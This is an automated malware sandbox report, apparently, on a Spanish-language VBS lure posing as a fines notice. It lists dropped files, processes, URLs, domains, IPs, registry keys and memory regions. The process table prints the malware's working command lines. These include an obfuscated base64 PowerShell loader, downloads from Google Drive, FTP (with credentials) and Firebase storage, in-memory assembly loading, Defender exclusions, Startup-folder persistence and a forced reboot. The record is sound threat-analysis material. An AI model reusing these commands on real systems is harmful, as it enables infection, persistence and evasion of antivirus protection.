Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Oficio notificacion multas y sanciones.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1
|
Unicode text, UTF-16, little-endian text, with very long lines (32656)
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1
|
ASCII text, with very long lines (337), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2yfh01gy.ai5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3tztvill.0jl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxgckrry.o3r.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2w31zvg.f1g.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dcu2olee.gyi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e4dzadck.eq4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_egqs2cvs.fio.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esimclt3.okc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gv02y0bp.y5b.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3laic2k.a2s.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2xvaybo.sc4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lukmjau4.e1u.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nafty4e2.uoa.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nepsepwb.bqm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ooy0ctyb.fre.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opweeao4.b1e.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pginevyz.koj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcyk52g3.3bj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rk3gefbd.wmb.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqmp5iao.ojc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF6da1db.TMP
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF6dc188.TMP
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MVMAZEKE6YQ4XTFMMU7S.temp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P32ZI24FW5IL27D26J50.temp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UHT44YAMZRAENXN1K5VR.temp
|
data
|
dropped
|
There are 21 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???QwBC???Gw???J??????7???Ck???JwB??????E??????c???BK???Dg???Nw???1???DE???MgBv???HI???c???By???GU???c???Bv???Gw???ZQB2???GU???Z??????n???Cw???KQ???p???Dk???N??????s???DY???MQ???x???Cw???Nw???5???Cw???N??????x???DE???L??????4???Dk???L??????4???DE???MQ???s???Dc???M??????x???Cw???OQ???5???Cw???NQ???x???DE???L??????x???D??????MQ???s???D??????M??????x???Cg???XQBd???Fs???cgBh???Gg???YwBb???C??????bgBp???G8???ag???t???Cg???K???Bs???GE???aQB0???G4???ZQBk???GU???cgBD???Gs???cgBv???Hc???d???Bl???E4???LgB0???GU???Tg???u???G0???ZQB0???HM???eQBT???C??????d???Bj???GU???agBi???G8???LQB3???GU???bg???g???D0???I???Bz???Gw???YQBp???HQ???bgBl???GQ???ZQBy???EM???LgB6???HQ???e???Bo???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???OwBn???FM???egBD???EI???b??????k???Ds???Mg???x???HM???b???BU???Do???OgBd???GU???c???B5???FQ???b???Bv???GM???bwB0???G8???cgBQ???Hk???d???Bp???HI???dQBj???GU???Uw???u???HQ???ZQBO???C4???bQBl???HQ???cwB5???FM???Ww???g???D0???I???Bs???G8???YwBv???HQ???bwBy???F??????eQB0???Gk???cgB1???GM???ZQBT???Do???OgBd???HI???ZQBn???GE???bgBh???E0???d???Bu???Gk???bwBQ???GU???YwBp???HY???cgBl???FM???LgB0???GU???Tg???u???G0???ZQB0???HM???eQBT???Fs???OwB9???GU???dQBy???HQ???J???B7???C??????PQ???g???Gs???YwBh???GI???b???Bs???GE???QwBu???G8???aQB0???GE???Z???Bp???Gw???YQBW???GU???d???Bh???GM???aQBm???Gk???d???By???GU???QwBy???GU???dgBy???GU???Uw???6???Do???XQBy???GU???ZwBh???G4???YQBN???HQ???bgBp???G8???U???Bl???GM???aQB2???HI???ZQBT???C4???d???Bl???E4???LgBt???GU???d???Bz???Hk???UwBb???Hs???I???Bl???HM???b???Bl???H0???I???Bm???C8???I??????w???C??????d??????v???C??????cg???v???C??????ZQB4???GU???LgBu???Hc???bwBk???HQ???dQBo???HM???I??????7???Cc???M??????4???DE???I???Bw???GU???ZQBs???HM???Jw???g???GQ???bgBh???G0???bQBv???GM???LQ???g???GU???e???Bl???C4???b???Bs???GU???a???Bz???HI???ZQB3???G8???c??????7???C??????ZQBj???HI???bwBm???C0???I??????p???C??????JwBw???HU???d???By???GE???d???BT???Fw???cwBt???GE???cgBn???G8???cgBQ???Fw???dQBu???GU???TQ???g???HQ???cgBh???HQ???UwBc???HM???dwBv???GQ???bgBp???Fc???X???B0???GY???bwBz???G8???cgBj???Gk???TQBc???Gc???bgBp???G0???YQBv???FI???X???Bh???HQ???YQBE???H??????c???BB???Fw???Jw???g???Cs???I???Ba???Es???bgBZ???E0???J??????g???Cg???I???Bu???G8???aQB0???GE???bgBp???HQ???cwBl???EQ???LQ???g???Cc???JQBJ???Gg???cQBS???Fg???JQ???n???C??????bQBl???HQ???SQ???t???Hk???c???Bv???EM???I??????7???C??????d???By???GE???d???Bz???GU???cgBv???G4???Lw???g???HQ???ZQBp???HU???cQ???v???C??????RwBj???Fc???aQBS???C??????ZQB4???GU???LgBh???HM???dQB3???C??????ZQB4???GU???LgBs???Gw???ZQBo???HM???cgBl???Hc???bwBw???C??????Ow???p???Cc???dQBz???G0???LgBu???Gk???dwBw???FU???X??????n???C??????Kw???g???E4???SgBU???Hg???R??????k???Cg???I??????9???C??????RwBj???Fc???aQBS???Ds???KQ???g???GU???bQBh???E4???cgBl???HM???VQ???6???Do???XQB0???G4???ZQBt???G4???bwBy???Gk???dgBu???EU???Ww???g???Cs???I??????n???Fw???cwBy???GU???cwBV???Fw???OgBD???Cc???K??????g???D0???I???Ba???Es???bgBZ???E0???J??????7???Ck???JwB1???HM???bQ???u???G4???aQB3???H??????VQBc???Cc???I??????r???C??????TgBK???FQ???e???BE???CQ???I??????s???EI???SwBM???FI???VQ???k???Cg???ZQBs???Gk???RgBk???GE???bwBs???G4???dwBv???EQ???LgBu???Eo???eQBW???Go???J??????7???Dg???RgBU???FU???Og???6???F0???ZwBu???Gk???Z???Bv???GM???bgBF???C4???d???B4???GU???V??????u???G0???ZQB0???HM???eQBT???Fs???I??????9???C??????ZwBu???Gk???Z???Bv???GM???bgBF???C4???bgBK???Hk???VgBq???CQ???Ow???p???HQ???bgBl???Gk???b???BD???GI???ZQBX???C4???d???Bl???E4???I???B0???GM???ZQBq???GI???Tw???t???Hc???ZQBO???Cg???I??????9???C??????bgBK???Hk???VgBq???CQ???OwB9???Ds???I??????p???Cc???d???BP???Ew???YwBf???Es???YQ???z???Fo???ZgBv???Fg???MgBK???Eo???cgBW???Gg???bQBW???Dk???YwBt???Dk???W???Bz???HU???W???Bt???Go???MQBn???DE???Jw???g???Cs???I???Bv???Hg???SwBV???Gc???J??????o???C??????PQ???g???G8???e???BL???FU???Zw???k???Hs???I???Bl???HM???b???Bl???H0???Ow???g???Ck???Jw???y???DQ???dQBY???Eo???V???Bx???GE???bQBn???Hk???TQB0???EY???egBh???Gs???U???BS???DE???cQBf???Ek???dgBH???Gk???W???BO???GQ???cQBh???E4???MQ???n???C??????Kw???g???G8???e???BL???FU???Zw???k???CgAIAA9ACAAbwB4AEsAVQBnACQAewAgACkAIAB1AE4AQwBWAHEAJAAgACgAIABmAGkAOwAgACkAJwA0ADYAJwAoAHMAbgBpAGEAdABuAG8AQwAuAEUAUgBVAFQAQwBFAFQASQBIAEMAUgBBAF8AUgBPAFMAUwBFAEMATwBSAFAAOgB2AG4AZQAkACAAPQAgAHUATgBDAFYAcQAkADsAJwA9AGQAaQAmAGQAYQBvAGwAbgB3AG8AZAA9AHQAcgBvAHAAeABlAD8AYwB1AC8AbQBvAGMALgBlAGwAZwBvAG8AZwAuAGUAdgBpAHIAZAAvAC8AOgBzAHAAdAB0AGgAJwAgAD0AIABvAHgASwBV???GcAJAA7ACkAIAAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABOAEoAVAB4AEQAJAAgACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAATgBKAFQAeABEACQAewAgACkAIABQAGIAbgBFAFoAJAAgACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABQAGIAbgBFAFoAJAAgADsA';$kahlN
= $qKKzc.replace('???' , 'A') ;$vQpeD = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $kahlN
) ); $vQpeD = $vQpeD[-1..-$vQpeD.Length] -join '';$vQpeD = $vQpeD.replace('%XRqhI%','C:\Users\user\Desktop\Oficio notificacion
multas y sanciones.vbs');powershell $vQpeD
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN
= [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu
= $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else
{$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB,
$DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe
RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ
+ '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe
/r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol
= [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials
= new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg
= $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object
Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio
notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' )
);[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]]
( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'
, $huUPX , 'true' ) );};"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
|
||
C:\Windows\System32\cmd.exe
|
cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1"
|
||
C:\Windows\System32\cmd.exe
|
cmd.exe /c del "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System
Update\yoexw.ps1' ";exit
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System
Update\yoexw.ps1' ";exit
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System
Update\yoexw.ps1' ";exit
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System
Update\yoexw.ps1' ";exit
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd.exe /C Y /N /D Y /T 1 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 14 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
https://pastecodeapp.vercel.app
|
unknown
|
||
https://pastecodeapp.vXB
|
unknown
|
||
https://pastecodeapp.vercel.app/pastes/019220a5-2811-7ab8-829c-a7f4350452e0/rawP
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://crl.microsoft
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://ftp.desckvbrat.com.br
|
unknown
|
||
https://go.micro
|
unknown
|
||
http://desckvbrat.com.br
|
unknown
|
||
https://pastecodeapp.vercel.app/pastes/019220a3-9326-7b46-b740-ef110ecdb453/raw
|
76.76.21.22
|
||
http://www.microsoft.co
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://pastecodeapp.vercel.app/pastes/019220a5-2811-7ab8-829c-a7f4350452e0/raw
|
76.76.21.22
|
||
https://aka.ms/pscore6
|
unknown
|
||
https://pastebin.com/raw/pQQ0n3eA
|
104.20.4.235
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://pastecodeapp.vercel.app/pastes/019220a3-9326-7b46-b740-ef110ecdb453/rawP
|
unknown
|
||
https://pastecodeapp.vX
|
unknown
|
||
https://pastecodeapp.vercel.app/pastes/01922156-0a1a-798a-ba18-d0ce12473978/rawP
|
unknown
|
||
https://pastecodeapp.vercel.app/pastes/01922156-0a1a-798a-ba18-d0ce12473978/raw
|
76.76.21.22
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://oneget.orgX
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://pastecodeapp.vercel.app
|
unknown
|
||
https://firebasestorage.googleh
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://pastebin.com
|
unknown
|
||
https://pastebin.com
|
unknown
|
||
http://crl.mdHy
|
unknown
|
||
https://oneget.org
|
unknown
|
There are 26 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
desckvbrat.com.br
|
191.252.83.213
|
||
pastebin.com
|
104.20.4.235
|
||
notificadoresrma.duckdns.org
|
46.246.14.5
|
||
ftp.desckvbrat.com.br
|
unknown
|
||
pastecodeapp.vercel.app
|
76.76.21.22
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
46.246.14.5
|
notificadoresrma.duckdns.org
|
Sweden
|
||
104.20.4.235
|
pastebin.com
|
United States
|
||
191.252.83.213
|
desckvbrat.com.br
|
Brazil
|
||
76.76.21.22
|
pastecodeapp.vercel.app
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Update Drivers NVIDEO_nyj
|
||
HKEY_CURRENT_USER
|
di
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\a388ab2ca3be4
|
[kl]
|
There are 7 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
2891000
|
trusted library allocation
|
page read and write
|
||
20959177000
|
trusted library allocation
|
page read and write
|
||
2078FC86000
|
trusted library allocation
|
page read and write
|
||
20A2AA0C000
|
trusted library allocation
|
page read and write
|
||
2078FFB6000
|
trusted library allocation
|
page read and write
|
||
20958E27000
|
trusted library allocation
|
page read and write
|
||
1F542643000
|
trusted library allocation
|
page read and write
|
||
20A2A709000
|
trusted library allocation
|
page read and write
|
||
402000
|
remote allocation
|
page execute and read and write
|
||
E2B70FB000
|
stack
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
7FF848DB0000
|
trusted library allocation
|
page read and write
|
||
20959130000
|
trusted library allocation
|
page read and write
|
||
256B8025000
|
heap
|
page read and write
|
||
5770000
|
trusted library allocation
|
page read and write
|
||
209708AB000
|
heap
|
page read and write
|
||
1EBC1CC8000
|
heap
|
page read and write
|
||
1F5408BD000
|
heap
|
page read and write
|
||
7FF848D90000
|
trusted library allocation
|
page read and write
|
||
7FF848F70000
|
trusted library allocation
|
page execute and read and write
|
||
DD1000
|
heap
|
page read and write
|
||
4EF0000
|
trusted library allocation
|
page read and write
|
||
1EBC1CF4000
|
heap
|
page read and write
|
||
256B7E80000
|
heap
|
page read and write
|
||
209589BA000
|
trusted library allocation
|
page read and write
|
||
922BBFF000
|
stack
|
page read and write
|
||
20A2A689000
|
trusted library allocation
|
page read and write
|
||
B87E63E000
|
stack
|
page read and write
|
||
20A28397000
|
heap
|
page read and write
|
||
513E000
|
stack
|
page read and write
|
||
1EBC1AA1000
|
heap
|
page read and write
|
||
7FF848E1C000
|
trusted library allocation
|
page read and write
|
||
7FF848D2A000
|
trusted library allocation
|
page read and write
|
||
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
7FF848D80000
|
trusted library allocation
|
page read and write
|
||
1563000
|
heap
|
page read and write
|
||
1EBC1FD4000
|
heap
|
page read and write
|
||
5766000
|
trusted library allocation
|
page read and write
|
||
20970960000
|
heap
|
page read and write
|
||
7FF848B8B000
|
trusted library allocation
|
page read and write
|
||
20A2A19A000
|
trusted library allocation
|
page read and write
|
||
152B000
|
trusted library allocation
|
page execute and read and write
|
||
2569DC60000
|
heap
|
page read and write
|
||
20958DFA000
|
trusted library allocation
|
page read and write
|
||
BD571AF000
|
stack
|
page read and write
|
||
20958510000
|
heap
|
page readonly
|
||
1EBBFA70000
|
heap
|
page read and write
|
||
2569F909000
|
